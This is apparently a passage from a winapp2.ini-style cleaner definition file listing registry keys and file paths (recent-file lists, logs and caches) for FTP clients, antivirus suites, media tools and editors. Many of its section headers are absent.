FileKey2=%ProgramFiles%\CoreFTP|COREFTP.LOG
FileKey1=%AppData%\FileZilla|recentservers.xml;search.xml
[SmartFTP]
Detect=HKCU\Software\SmartFTP
RegKey1=HKCU\Software\SmartFTP\Client 2.0\Settings\History\Items
FileKey1=%AppData%\SmartFTP\Client 2.0\Log|*.*|RECURSE
FileKey2=%AppData%\SmartFTP\Client 2.0\Storage|*.*
FileKey1=%allusersprofile%\.clamwin\log|*.*
FileKey2=%userprofile%\.clamwin\log|*.*
FileKey3=%windir%\All Users\.clamwin\log|*.*
FileKey1=%ProgramFiles%\Ewido\Security Suite|logfile.txt
FileKey2=%ProgramFiles%\Ewido Anti-Malware|logfile.txt
FileKey1=%ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5|logfile.txt
DetectFile=%ProgramFiles%\Malwarebytes' Anti-Malware\mbam.exe
FileKey1=%appdata%\Malwarebytes\Malwarebytes' Anti-Malware\Logs|*.txt
FileKey2=%appdata%\Malwarebytes\Malwarebytes' Anti-Malware\Quarantine|*.*
FileKey1=%ProgramFiles%\Spyware Terminator\update|*.*
FileKey2=%AppData%\Spyware Terminator\Reports|*.*
Detect=HKLM\Software\SUPERAntiSpyware.com\SUPERAntiSpyware
FileKey1=%AppData%\SUPERAntiSpyware.com\SUPERAntiSpyware\Logs|*.log
FileKey2=%AppData%\SUPERAntiSpyware.com\SUPERAntiSpyware\AppLogs|*.dmp;*.SDB
FileKey1=%MyDocuments%\a-squared Free\Reports|*.txt
RegKey1=HKCU\Software\Foxit Software\Foxit Reader\Recent File List
RegKey2=HKCU\Software\Foxit Software\Foxit Reader\History
RegKey1=HKCU\Software\Foxit Software\Foxit Reader 6.0\Recent File List
RegKey2=HKCU\Software\Foxit Software\Foxit Reader 6.0\RecentFiles
RegKey3=HKCU\Software\Foxit Software\Foxit Reader 6.0\Preferences\History\LastOpen
RegKey4=HKCU\Software\Foxit Software\Foxit Reader 6.0\Preferences\History\LastSession
RegKey5=HKCU\Software\Foxit Software\Foxit Reader 6.0\Preferences\Others|csInitialOpenDir
RegKey6=HKCU\Software\Foxit Software\Foxit Reader 6.0\ImageTool|ImageDefPath
FileKey1=%LocalAppData%\Foxit Reader\|*_old.DMP
FileKey2=%AppData%\Foxit Software\Foxit Reader\Foxit Cloud\DownloadCache|*.cache
FileKey3=%AppData%\Foxit Software\Foxit Reader\Foxit Cloud\FileIDCache|*.ids
FileKey4=%AppData%\Foxit Software\Foxit Reader\Foxit Cloud|foxitcloud.log
[Paint.NET]
Detect=HKCU\Software\Paint.NET
RegKey1=HKCU\Software\Paint.NET|MRU0
RegKey2=HKCU\Software\Paint.NET|MRU1
RegKey3=HKCU\Software\Paint.NET|MRU2
RegKey4=HKCU\Software\Paint.NET|MRU3
RegKey5=HKCU\Software\Paint.NET|MRU4
RegKey6=HKCU\Software\Paint.NET|MRU5
RegKey7=HKCU\Software\Paint.NET|MRU6
RegKey8=HKCU\Software\Paint.NET|MRU7
RegKey9=HKCU\Software\Paint.NET|MRU0Thumb
RegKey10=HKCU\Software\Paint.NET|MRU1Thumb
RegKey11=HKCU\Software\Paint.NET|MRU2Thumb
RegKey12=HKCU\Software\Paint.NET|MRU3Thumb
RegKey13=HKCU\Software\Paint.NET|MRU4Thumb
RegKey14=HKCU\Software\Paint.NET|MRU5Thumb
RegKey15=HKCU\Software\Paint.NET|MRU6Thumb
RegKey16=HKCU\Software\Paint.NET|MRU7Thumb
DetectFile=%ProgramFiles%\OpenOffice.org1.1.4\program\soffice.exe
FileKey1=%ProgramFiles%\OpenOffice.org1.1.4\user\registry\data\org\openoffice\Office|Common.xcu
Detect=HKLM\SOFTWARE\OpenOffice.org\OpenOffice.org\2.0
FileKey1=%appdata%\OpenOffice.org2\user\registry\data\org\openoffice\Office|Common.xcu
Detect=HKLM\SOFTWARE\OpenOffice.org\OpenOffice.org\2.1
Detect=HKLM\SOFTWARE\OpenOffice.org\OpenOffice.org\3.0
Detect2=HKLM\SOFTWARE\OpenOffice.org\OpenOffice.org\3.1
Detect3=HKLM\SOFTWARE\OpenOffice.org\OpenOffice.org\3.2
Detect4=HKCU\SOFTWARE\OpenOffice.org\OpenOffice.org\3.0
Detect5=HKCU\SOFTWARE\OpenOffice.org\OpenOffice.org\3.1
Detect6=HKCU\SOFTWARE\OpenOffice.org\OpenOffice.org\3.2
Detect7=HKCU\SOFTWARE\OpenOffice.org\OpenOffice.org\3.3
Detect8=HKLM\SOFTWARE\OpenOffice.org\OpenOffice.org\3.3
FileKey1=%appdata%\OpenOffice.org\3\user\registry\data\org\openoffice\Office|Histories.xcu
Detect=HKLM\SOFTWARE\Wow6432Node\OpenOffice\OpenOffice\4.0.0
Detect2=HKLM\SOFTWARE\OpenOffice\OpenOffice\4.0.0
FileKey1=%AppData%\OpenOffice\4\user\backup|*.ubackup
FileKey2=%AppData%\OpenOffice\4\user\temp|document_io_logring.txt
FileKey3=%AppData%\OpenOffice\4\user\uno_packages\cache|log.txt;*.cache
FileKey4=%ProgramFiles%\OpenOffice 4\presets\backup|*.cbackup
FileKey5=%ProgramFiles%\OpenOffice 4\presets\temp|*.tmp
FileKey6=%ProgramFiles%\OpenOffice 4\presets\uno_packages\cache|log.txt
FileKey1=%commonappdata%\Grisoft\Avg7Data|*.log
FileKey2=%commonappdata%\Grisoft\Avg7Data\upd7bin|*.*
FileKey3=%commonappdata%\Grisoft\Avg7Data\$history|*.*
FileKey4=%commonappdata%\Grisoft\Avg7Data\avg7upd|*.log
FileKey5=%windir%\All Users\Application Data\Grisoft\Avg7Data\upd7bin|*.*
FileKey6=%windir%\All Users\Application Data\Grisoft\Avg7Data\avg7upd|$history
FileKey7=%windir%\All Users\Application Data\Grisoft\Avg7Data\avg7upd|*.log
FileKey8=%windir%\All Users\Application Data\Grisoft\Avg7Data|*.log
FileKey9=%windir%\Application Data\AVG7\Log|*.log
FileKey1=%CommonAppData%\avg8\Log|*.log;*.xml
FileKey2=%CommonAppData%\avg8\scanlogs|*.log
FileKey3=%CommonAppData%\avg8\update\backup|*.*
FileKey4=%CommonAppData%\avg8\Emc\Log|*.log
FileKey1=%CommonAppData%\avg9\Log|*.log;*.xml
FileKey2=%CommonAppData%\avg9\scanlogs|*.log
FileKey3=%CommonAppData%\avg9\update\backup|*.*
FileKey4=%CommonAppData%\avg9\Emc\Log|*.log
FileKey1=%CommonAppData%\avg10\Log|*.log;*.xml
FileKey2=%CommonAppData%\avg10\scanlogs|*.log
FileKey3=%CommonAppData%\avg10\update\backup|*.*
FileKey4=%CommonAppData%\avg10\Emc\Log|*.log
FileKey5=%CommonAppData%\avg10\IDS\config|*List.zip.bak
FileKey6=%CommonAppData%\avg10\IDS\profile|globalLoadable.bak
FileKey7=%CommonAppData%\avg10\Temp|*.tmp
FileKey1=%CommonAppData%\AVG2012\Log|*.log;history.xml
FileKey2=%CommonAppData%\AVG2012\scanlogs|*.log
FileKey3=%CommonAppData%\AVG2012\update\backup|*.*
FileKey4=%CommonAppData%\AVG2012\Emc\Log|*.log
FileKey5=%CommonAppData%\AVG2012\IDS\config|*List.zip.bak
FileKey6=%CommonAppData%\AVG2012\IDS\profile|globalLoadable.bak
FileKey7=%CommonAppData%\AVG2012\Temp|*.tmp
FileKey1=%CommonAppData%\AVG2013\Log|*.log;history.xml
FileKey2=%CommonAppData%\AVG2013\scanlogs|*.log
FileKey3=%CommonAppData%\AVG2013\update\backup|*.*
FileKey4=%CommonAppData%\AVG2013\Emc\Log|*.log
FileKey5=%CommonAppData%\AVG2013\IDS\config|*List.zip.bak
FileKey6=%CommonAppData%\AVG2013\IDS\profile|globalLoadable.bak
FileKey7=%CommonAppData%\AVG2013\Temp|*.tmp
FileKey1=%CommonAppData%\Avira\AntiVir Desktop|*.old
FileKey2=%CommonAppData%\Avira\AntiVir Desktop|*.tmp
FileKey3=%CommonAppData%\Avira\Antivir Desktop\BACKUP\FAILSAFE|*.tmp
FileKey4=%CommonAppData%\Avira\AntiVir Desktop\LOGFILES|*.*
FileKey5=%CommonAppData%\Avira\AntiVir Desktop\TEMP|*.*
FileKey6=%CommonAppData%\Avira\My Avira\Logfiles|*.*
FileKey7=%CommonAppData%\Avira\My Avira\Temp|*.*
FileKey8=%ProgramFiles%\Avira\AntiVir Desktop|*.old
FileKey9=%ProgramFiles%\Avira\AntiVir Desktop|*.tmp
FileKey10=%ProgramFiles%\Avira\AntiVir Desktop\FAILSAFE|*.tmp
FileKey1=%ProgramFiles%\Alwil Software\Avast4\DATA\report|avast.xsl;Resident protection.txt;Simple user interface.txt;Simple user interface*.xml
FileKey2=%ProgramFiles%\Alwil Software\Avast4\DATA\log|*.*
FileKey1=%ProgramData%\Alwil Software\Avast5\report|avast.xsl;avast.xsl;Resident protection.txt;Simple user interface.txt;Simple user interface*.xml
FileKey2=%ProgramData%\Alwil Software\Avast5\log|*.*
FileKey1=%ProgramData%\Avast Software\Avast\log|*.*
FileKey1=%ProgramData%\AVAST Software\Avast\log|*.txt
FileKey2=%ProgramData%\AVAST Software\Avast\Spamconf|*.bin.tmp*
FileKey3=%ProgramData%\AVAST Software\Avast\report|*.txt
FileKey1=%ProgramFiles%\BitDefender\BitDefender 2009\Logs|*.*|RECURSE
FileKey2=%CommonAppData%\BitDefender\Desktop\Profiles\Logs|*.xml|RECURSE
FileKey3=%AppData%\BitDefender\Desktop\Profiles\Logs|*.xml|RECURSE
RegKey1=HKCU\Software\TUGZip|mainRecent
RegKey2=HKCU\Software\TUGZip|extrRecent
RegKey3=HKCU\Software\TUGZip|cmpWorkingDir
[Windows Defender]
Detect=HKLM\SOFTWARE\Microsoft\Windows Defender
DetectFile=%ProgramFiles%\Microsoft AntiSpyware\GIANTAntiSpywareMain.exe
FileKey1=%CommonAppData%\Microsoft\Windows Defender\Scans\History\Results\Quick|*.*
FileKey2=%CommonAppData%\Microsoft\Windows Defender\Scans\History\Results\Resource|*.*
FileKey3=%CommonAppData%\Microsoft\Windows Defender\Support|*.log
FileKey4=%ProgramFiles%\Microsoft AntiSpyware|errors.log;tracksEraser.log;cleaner.log
RegKey1=HKCU\Software\IZSoftware\IZArc|AppCurrentDir
RegKey2=HKCU\Software\IZSoftware\IZArc\Recent
RegKey3=HKCU\Software\IZSoftware\IZArc\History
[Google Toolbar Firefox]
SpecialDetect=DET_MOZILLA_GOOGLE_TOOLBAR
SpecialKey1=N_MOZ_GOOGLE_TOOLBAR
FileKey1=%LocalAppData%\Microsoft\Search Enhancement Pack\Search Box Extension|searchhs.dat
FileKey2=%LocalLowAppData%\Microsoft\Search Enhancement Pack\Search Box Extension|searchhs.dat
FileKey1=%LocalAppData%\Microsoft\OIS|OIScatalog.cag
FileKey2=%LocalAppData%\Microsoft\OIS\thumbnails|*.*
DetectFile=%ProgramFiles%\Imgburn\imgburn.exe
RegKey1=HKCU\Software\ImgBurn|ISOBUILD_MRUBootImage
RegKey2=HKCU\Software\ImgBurn|ISOBUILD_MRUDeviceName
RegKey3=HKCU\Software\ImgBurn|ISOBUILD_MRUSourceFile
RegKey4=HKCU\Software\ImgBurn|ISOBUILD_MRUSourceFolder
RegKey5=HKCU\Software\ImgBurn|ISOBUILD_RecentFiles_Destination
RegKey6=HKCU\Software\ImgBurn|ISOBUILD_RecentFiles_Source
RegKey7=HKCU\Software\ImgBurn|ISOBUILD_RecentFolders_Destination
RegKey8=HKCU\Software\ImgBurn|ISOWRITE_MRUDeviceName
RegKey9=HKCU\Software\ImgBurn|ISOWRITE_RecentFiles_Source
RegKey10=HKCU\Software\ImgBurn|FILELOCATIONS_ProjectFiles
RegKey11=HKCU\Software\ImgBurn|FILELOCATIONS_QueueFiles
FileKey1=%AppData%\ImgBurn|ImgBurn.log
FileKey2=%AppData%\ImgBurn\IBG Files|*.*
FileKey3=%AppData%\imgburn\graph data files|*.*
FileKey4=%AppData%\imgburn\Log Files|*.*
RegKey1=HKCU\Software\SlySoft\CloneCD\Settings|ImageFileName
RegKey1=HKCU\Software\Elaborate Bytes\VirtualCloneDrive\LRU
FileKey1=%ProgramFiles%\BillP Studios\WinPatrol|WinPatrolLog.*
FileKey2=%SystemDrive%|HijackPatrol.log
FileKey1=%LocalAppData%\LogMeIn Hamachi|*.log
FileKey2=%LocalAppData%\LogMeIn Hamachi|*.old
FileKey3=%LocalAppData%\LogMeIn Hamachi|*.bak
FileKey4=%ProgramFiles%\Logmein|LMI*.log
FileKey5=%ProgramData%\Logmein|LMI*.log
FileKey1=%AppData%\Ashampoo\Ashampoo Burning Studio 10|backupmetainfo.xml
FileKey2=%AppData%\Ashampoo\Ashampoo Burning Studio 10\Log|*.xml
FileKey3=%AppData%\Ashampoo\Log|*.txt
FileKey1=%AppData%\Ashampoo\Ashampoo Burning Studio 11|backupmetainfo.xml
FileKey2=%AppData%\Ashampoo\Ashampoo Burning Studio 11\Log|*.xml
FileKey1=%AppData%\Ashampoo\Ashampoo Burning Studio 14\log|*log.txt
FileKey2=%AppData%\Ashampoo\Ashampoo Burning Studio 14\log|*.xml
RegKey1=HKCU\Software\PrestoSoft\ExamDiff\AutoPick
RegKey2=HKCU\Software\PrestoSoft\ExamDiff\Recent Find Strings
RegKey3=HKCU\Software\PrestoSoft\ExamDiff\Recent Left Files
RegKey4=HKCU\Software\PrestoSoft\ExamDiff\Recent Right Files
RegKey5=HKCU\Software\PrestoSoft\ExamDiff\Settings|File 1
RegKey6=HKCU\Software\PrestoSoft\ExamDiff\Settings|File 2
RegKey1=HKCU\Software\PrestoSoft\ExamDiff Pro\AutoPick
RegKey2=HKCU\Software\PrestoSoft\ExamDiff Pro\Recent Find Strings Bin
RegKey3=HKCU\Software\PrestoSoft\ExamDiff Pro\Recent Left Directories
RegKey4=HKCU\Software\PrestoSoft\ExamDiff Pro\Recent Left Files
RegKey5=HKCU\Software\PrestoSoft\ExamDiff Pro\Recent Right Directories
RegKey6=HKCU\Software\PrestoSoft\ExamDiff Pro\Recent Right Files
RegKey7=HKCU\Software\PrestoSoft\ExamDiff Pro\Recent Session Files
RegKey8=HKCU\Software\PrestoSoft\ExamDiff Pro\Settings|File 1
RegKey9=HKCU\Software\PrestoSoft\ExamDiff Pro\Settings|File 2
Detect=HKCU\Software\grigsoft.com\Compare It!
RegKey1=HKCU\Software\grigsoft.com\Compare It!\Combos
RegKey2=HKCU\Software\grigsoft.com\Compare It!\dirs
RegKey3=HKCU\Software\grigsoft.com\Compare It!\options|Recent0
RegKey4=HKCU\Software\grigsoft.com\Compare It!\options|Recent1
RegKey5=HKCU\Software\grigsoft.com\Compare It!\options|Recent2
RegKey6=HKCU\Software\grigsoft.com\Compare It!\options|Recent3
RegKey7=HKCU\Software\grigsoft.com\Compare It!\options|Recent4
RegKey8=HKCU\Software\grigsoft.com\Compare It!\options|Recent5
RegKey9=HKCU\Software\grigsoft.com\Compare It!\options|Recent6
RegKey10=HKCU\Software\grigsoft.com\Compare It!\options|Recent7
RegKey11=HKCU\Software\grigsoft.com\Compare It!\options|Recent8
RegKey12=HKCU\Software\grigsoft.com\Compare It!\options|Recent9
RegKey13=HKCU\Software\grigsoft.com\Compare It!\options|Recent10
RegKey1=HKCU\Software\Microsoft\Windiff|NameLeft
RegKey2=HKCU\Software\Microsoft\Windiff|NameRight
RegKey1=HKCU\Software\Bradbury\FeedDemon\1.0\SavedLists\TypedURLs
RegKey2=HKCU\Software\Bradbury\FeedDemon\1.0\SavedLists\TabbedBrowserUrls
RegKey3=HKCU\Software\Bradbury\FeedDemon\1.0\SearchFeedKeywords
[Last.FM]
DetectFile=%ProgramFiles%\Last.fm\LastFM.exe
FileKey1=%LocalAppData%\Last.fm\client\cache|*.*
FileKey2=%LocalAppData%\Last.fm\client|*.log
FileKey1=%LocalAppData%\Pando\Pando Files|*.log
DetectFile=%ProgramFiles%\Sandboxie\Start.exe
FileKey1=%SystemDrive%\Sandbox\%UserName%|*.*|RECURSE
ExcludeKey1=FILE|%SystemDrive%\Sandbox\%UserName%\DONT-USE.TXT
ExcludeKey2=FILE|%SystemDrive%\Sandbox\%UserName%\desktop.ini
RegKey1=HKCU\Software\TechSmith\SnagIt\9\Recent Captures
RegKey2=HKCU\Software\TechSmith\SnagIt\9\SnagItEditor\Recent File List
FileKey1=%LocalAppData%\TechSmith\SnagIt|Tray.bin
RegKey1=HKCU\Software\TechSmith\SnagIt\10\Recent Captures
RegKey2=HKCU\Software\TechSmith\SnagIt\10\SnagItEditor\Recent File List
FileKey2=%LocalAppData%\TechSmith\SnagIt\DataStore\AppIcons|*.*
FileKey3=%LocalAppData%\TechSmith\SnagIt\DataStore\WebSiteIcons|*.*
FileKey4=%LocalAppData%\TechSmith\SnagIt\Thumbnails|*.*
RegKey1=HKCU\Software\TechSmith\SnagIt\11\Recent Captures
RegKey2=HKCU\Software\TechSmith\SnagIt\11\SnagItEditor\Recent File List
RegKey1=HKCU\Software\TechSmith\SnagIt\12\Recent Captures
RegKey2=HKCU\Software\TechSmith\SnagIt\12\SnagItEditor\Recent File List
FileKey2=%LocalAppData%\TechSmith\SnagIt\DataStore\AppIcons|*.ico
FileKey3=%LocalAppData%\TechSmith\SnagIt\DataStore\WebSiteIcons|*.ico
FileKey1=%AppData%\Ditto|ditto.db
FileKey1=%LocalAppData%\Evernote\Evernote\Logs|*.*
FileKey1=%AppData%\I2P\logs|*.*
DetectFile=%CommonAppData%\McAfee\MCLOGS
FileKey1=%CommonAppData%\McAfee\MCLOGS|*.log|RECURSE
FileKey1=%CommonAppData%\Raxco\PerfectDisk\8.0|PDBootLog
FileKey1=%CommonAppData%\Raxco\PerfectDisk\9.0|PDBootLog
FileKey1=%CommonAppData%\Raxco\PerfectDisk\10.0|PDBootLog
FileKey1=%CommonAppData%\Raxco\PerfectDisk\11.0|PDBootLog
FileKey1=%CommonAppData%\Raxco\PerfectDisk\12.0|PDBootLog
FileKey1=%CommonAppData%\Raxco\PerfectDisk\12.5|PDBootLog
RegKey1=HKCU\Software\PowerISO|Reopen0
RegKey2=HKCU\Software\PowerISO|Reopen1
RegKey3=HKCU\Software\PowerISO|Reopen2
RegKey4=HKCU\Software\PowerISO|Reopen3
RegKey5=HKCU\Software\PowerISO|ExtractPath0
RegKey6=HKCU\Software\PowerISO|ExtractPath1
RegKey7=HKCU\Software\PowerISO|ExtractPath2
RegKey8=HKCU\Software\PowerISO|ExtractPath3
RegKey9=HKCU\Software\PowerISO|ExtractPath4
RegKey10=HKCU\Software\PowerISO|ExtractPath5
RegKey11=HKCU\Software\PowerISO|ExtractPath6
RegKey12=HKCU\Software\PowerISO|ExtractPath7
RegKey1=HKCU\Software\EasyBoot Systems\UltraISO\5.0|Reopen
RegKey2=HKCU\Software\EasyBoot Systems\UltraISO\5.0|a
RegKey3=HKCU\Software\EasyBoot Systems\UltraISO\5.0|b
RegKey4=HKCU\Software\EasyBoot Systems\UltraISO\5.0|c
RegKey5=HKCU\Software\EasyBoot Systems\UltraISO\5.0|d
RegKey6=HKCU\Software\EasyBoot Systems\UltraISO\5.0|e
RegKey7=HKCU\Software\EasyBoot Systems\UltraISO\5.0|f
RegKey8=HKCU\Software\EasyBoot Systems\UltraISO\5.0|g
RegKey9=HKCU\Software\EasyBoot Systems\UltraISO\5.0|h
RegKey10=HKCU\Software\EasyBoot Systems\UltraISO\5.0|i
DetectFile=%UserProfile%\.gimp-2.4
FileKey1=%UserProfile%\.thumbnails\normal|*.*
FileKey2=%UserProfile%\.gimp-2.4|documents
DetectFile=%UserProfile%\.gimp-2.6
DetectFile=%UserProfile%\.gimp-2.8
FileKey1=%AppData%\Go!Zilla|GoZilla.hst
RegKey1=HKCU\Software\MagicISO\Reopen
FileKey1=%LocalAppData%\Microsoft\zune\art cache|*.*|REMOVESELF
FileKey2=%LocalAppData%\Microsoft\Zune|NowPlaying.dat
RegKey1=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU0
RegKey2=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU1
RegKey3=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU2
RegKey4=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU3
RegKey5=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU4
RegKey6=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU5
RegKey7=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU6
RegKey8=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU7
RegKey9=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU8
RegKey10=HKCU\Software\BreezeSystems\BreezeBrowserPro\100|MRU9
FileKey1=%AppData%\FastStone\FSIV|HisFolderList.db
Detect=HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\FSCapture.exe
RegKey1=HKCU\Software\FastStone|_GrbId
FileKey1=%LocalAppData%\FastStone\FSC\EditWith|*.*
FileKey2=%LocalAppData%\FastStone\FSC\Email|*.*
FileKey3=%LocalAppData%\FastStone\FSC\FTP|*.*
RegKey1=HKCU\Software\Akelsoft\AkelPad\Recent
RegKey2=HKCU\Software\Akelsoft\AkelPad\Search
FileKey1=%AppData%\notepad  |session.xml
RegKey1=HKLM\Software\NoteXpad\Recent
FileKey1=%ProgramFiles%\DCSoft\RegEditX\x86|RegEditX.sav
FileKey2=%ProgramFiles%\DCSoft\RegEditX\x64|RegEditX.sav
FileKey3=%ProgramFiles%\DCSoft\RegEditX\x86|RegEditX.bak
FileKey4=%ProgramFiles%\DCSoft\RegEditX\x64|RegEditX.bak
RegKey1=HKCU\Software\Foxit Software\Foxit Reader 5.0\Recent File List
RegKey2=HKCU\Software\Foxit Software\Foxit Reader 5.0\RecentFiles
RegKey3=HKCU\Software\Foxit Software\Foxit Reader 5.0\Preferences\History\LastOpen
RegKey4=HKCU\Software\Foxit Software\Foxit Reader 5.0\Preferences\History\LastSession
RegKey5=HKCU\Software\Foxit Software\Foxit Reader 5.0\Preferences\Others|csInitialOpenDir
DetectFile=%ProgramFiles%\ACD Systems\ACDSee\14.0\ACDSeeInTouch2.exe
RegKey1=HKCU\Software\ACD Systems\ACDSee\140|LastOptionPage
RegKey2=HKCU\Software\ACD Systems\ACDSee\140|LastOptionPageName
RegKey3=HKCU\Software\ACD Systems\ACDSee\140|OpenFolder
RegKey4=HKCU\Software\ACD Systems\ACDSee\140|HistSearchFileName
RegKey5=HKCU\Software\ACD Systems\ACDSee\140|HistSearchQuickText
RegKey6=HKCU\Software\ACD Systems\ACDSee\140|SimpleSearchHistory
RegKey1=HKCU\Software\TechSmith\Camtasia Studio\7.0\Camtasia Studio\7.0|FileSaveAsMru
RegKey2=HKCU\Software\TechSmith\Camtasia Studio\7.0\Camtasia Studio\7.0|ExportAsZipMru
RegKey3=HKCU\Software\TechSmith\Camtasia Studio\7.0\Camtasia Studio\7.0|MRUImportFolder
RegKey4=HKCU\Software\TechSmith\Camtasia Studio\7.0\Camtasia Studio\7.0|MRUOpenProjectFolder
RegKey5=HKCU\Software\TechSmith\Camtasia Studio\7.0\Camtasia Studio\7.0|MRUBatchAddFilesProjectsFolder
RegKey6=HKCU\Software\TechSmith\Camtasia Studio\7.0\Camtasia Studio\7.0|MRUImportExportCaptions
FileKey1=%AppData%\CoffeeCup Software\CoffeeCup HTML Editor\Settings|mru.ini
FileKey2=%AppData%\CoffeeCup Software\CoffeeCup HTML Editor\Settings|links.ini
FileKey3=%AppData%\CoffeeCup Software\CoffeeCup HTML Editor\Settings|lastopen.dat
FileKey1=%appdata%\AnvSoft\Any Video Converter Ultimate|history*.db
FileKey2=%appdata%\AnvSoft\Any Video Converter Ultimate|*.log
FileKey1=%ProgramFiles%\Freemake\Freemake Video Downloader|trace.log
FileKey2=%CommonAppData%\Freemake\FreemakeVideoDownloader|*.txt
FileKey3=%Documents%\Freemake\FreemakeVideoDownloader\History\Thumbnails|*.*
FileKey4=%Documents%\Freemake\FreemakeVideoDownloader\History|*.xml
FileKey1=%CommonAppData%\Freemake\FreemakeAudioConverter|*.txt
RegKey1=HKCU\Software\Freemake\FreemakeAudioConverter|InitVideoFileDirectory
RegKey2=HKCU\Software\Freemake\FreemakeAudioConverter|InitAudioFileDirectory
RegKey3=HKCU\Software\Freemake\FreemakeAudioConverter|InitImageFileDirectory
FileKey1=%CommonAppData%\Freemake\FreemakeVideoConverter|*.txt
RegKey1=HKCU\Software\Freemake\FreemakeVideoConverter|InitVideoFileDirectory
RegKey2=HKCU\Software\Freemake\FreemakeVideoConverter|InitAudioFileDirectory
RegKey3=HKCU\Software\Freemake\FreemakeVideoConverter|InitImageFileDirectory
RegKey4=HKCU\Software\Freemake\FreemakeVideoConverter|CurrentDVDDirectory
RegKey5=HKCU\Software\Freemake\FreemakeVideoConverter|AudioForSlideshow_0
RegKey6=HKCU\Software\Freemake\FreemakeVideoConverter|AudioForSlideshow_1
RegKey7=HKCU\Software\Freemake\FreemakeVideoConverter|AudioForSlideshow_2
RegKey8=HKCU\Software\Freemake\FreemakeVideoConverter|InitAudioDirectoryForSlideshow
RegKey9=HKCU\Software\Freemake\FreemakeVideoConverter|OutputDVDDirectory
RegKey10=HKCU\Software\Freemake\FreemakeVideoConverter|DVDOutputPath_0
RegKey11=HKCU\Software\Freemake\FreemakeVideoConverter|OutputPath1
RegKey12=HKCU\Software\Freemake\FreemakeVideoConverter|OutputPath2
RegKey13=HKCU\Software\Freemake\FreemakeVideoConverter|OutputPath3
RegKey14=HKCU\Software\Freemake\FreemakeVideoConverter|OutputPath4
RegKey15=HKCU\Software\Freemake\FreemakeVideoConverter|OutputDirectory
FileKey1=%AppData%\Vso|*.log
FileKey2=%Documents%\PcSetup|*.log|REMOVESELF
FileKey3=%CommonAppData%\VSO|*.cache
FileKey4=%CommonAppData%\VSO\ConvertXToDVD\5\log|*.log;*.crashlist|REMOVESELF
RegKey1=HKCU\Software\VSO\ConvertXtoDVD\4.0|Dvd_Folder
RegKey2=HKCU\Software\VSO\ConvertXtoDVD\4.0\settings\Gen_MRU_Pathes
RegKey3=HKCU\Software\VSO\ConvertXtoDVD\5\Gen_MRU_Pathes
FileKey1=%CommonAppData%\VSO\Blu-ray Converter Ultimate\2\Log|*.log
FileKey1=%CommonAppData%\VSO\DVD Converter Ultimate\2\Log|*.log
FileKey1=%AppData%\AIMP3|AIMP3.bak
FileKey2=%AppData%\AIMP3|AIMP3ate.bak
FileKey3=%AppData%\AIMP3|AIMP3lib.bak
FileKey4=%AppData%\AIMP3|AIMP3ac.bak
FileKey1=%AppData%\Corel\Messages|*.*|RECURSE
FileKey2=%AppData%\Ulead Systems\Corel VideoStudio Pro\14.0\en-US|VS_Pro.log
FileKey3=%Documents%\Corel VideoStudio Pro\14.0\SmartProxy|*.upx
RegKey1=HKCU\Software\Ulead Systems\Corel VideoStudio Pro\14.0\HerRFL
RegKey2=HKCU\Software\Ulead Systems\Corel VideoStudio Pro\14.0\Library Manager|Latest Export Folder
RegKey3=HKCU\Software\Ulead Systems\Corel VideoStudio Pro\14.0\VIO\Recent Dir
ExcludeKey1=FILE|%AppData%\Corel\Messages|*.policy
FileKey2=%AppData%\Ulead Systems\Corel VideoStudio Pro\15.0\en-US|VS_Pro.log
FileKey3=%Documents%\Corel VideoStudio Pro\15.0\SmartProxy|*.upx
RegKey1=HKCU\Software\Ulead Systems\Corel VideoStudio Pro\15.0\HerRFL
RegKey2=HKCU\Software\Ulead Systems\Corel VideoStudio Pro\15.0\Library Manager|Latest Export Folder
RegKey3=HKCU\Software\Ulead Systems\Corel VideoStudio Pro\15.0\VIO\Recent Dir
RegKey1=HKCU\Software\ESTsoft\ALZip\MRUOpen
RegKey2=HKCU\Software\ESTsoft\ALZip\MRUExtract
FileKey1=%LocalAppData%\Cyberlink\PhotoDirector\3.0|*.cache
FileKey1=%AppData%\CyberLink\MediaCache|*.*
FileKey2=%AppData%\CyberLink\PowerDirector\10.0|Recentfiles.ini
FileKey3=%AppData%\CyberLink\PowerDirector\10.0\DSPCache|*.*|RECURSE
FileKey4=%AppData%\CyberLink\PowerDirector\10.0\photoTmp|*.*|RECURSE
FileKey5=%AppData%\CyberLink\PowerDirector\10.0\SpltrCache|*.*|RECURSE
RegKey1=HKCU\Software\CyberLink\Hanuman\Waveform
RegKey2=HKCU\Software\CyberLink\MediaCache5\Data5
RegKey3=HKCU\Software\CyberLink\MediaCache5\Thumbnail5
RegKey1=HKCU\Software\CyberLink\PowerDirector12\MediaObj\MediaCache5\Data5
RegKey2=HKCU\Software\CyberLink\PowerDirector12\MediaObj\MediaCache5\Thumbnail5
RegKey3=HKCU\Software\CyberLink\PowerDirector12|ImportFilePath
FileKey1=%CommonAppData%\CyberLink\PowerDirector\12.0\AnalyzeCacheFiles|CLZoetrope.fdb
FileKey2=%AppData%\CyberLink\PowerDirector\12.0\DSPCache|*.*|RECURSE
FileKey3=%AppData%\CyberLink\PowerDirector\12.0\photoTmp|*.*
FileKey4=%AppData%\CyberLink\PowerDirector\12.0\SpltrCache|*.*
FileKey5=%AppData%\CyberLink\PowerDirector\12.0\WaveForms|PD_0000.txt
FileKey6=%AppData%\CyberLink\PowerDirector\12.0|Recentfiles.ini
FileKey7=%AppData%\CyberLink\MediaCache|*.*
RegKey1=HKCU\Software\CyberLink\AudioDirector4\MediaObj\MediaCache5\Data5
FileKey1=%CommonAppData%\CyberLink\Downloader|Item0.bak;Item1.bak;Item2.bak;Item3.bak;Item4.bak
FileKey2=%CommonAppData%\install_clap|*.*|RECURSE
FileKey3=%LocalAppData%\Cyberlink\AudioDirector\4.0\Temp|*.txt;*.pk
FileKey1=%AppData%\DivX\Player|Media Library
RegKey1=HKCU\Software\UniExtract\Directory
RegKey2=HKCU\Software\UniExtract\File
FileKey1=%AppData%\4Sync|*.log
FileKey1=%AppData%\Copernic\*\Searches|*.*|RECURSE
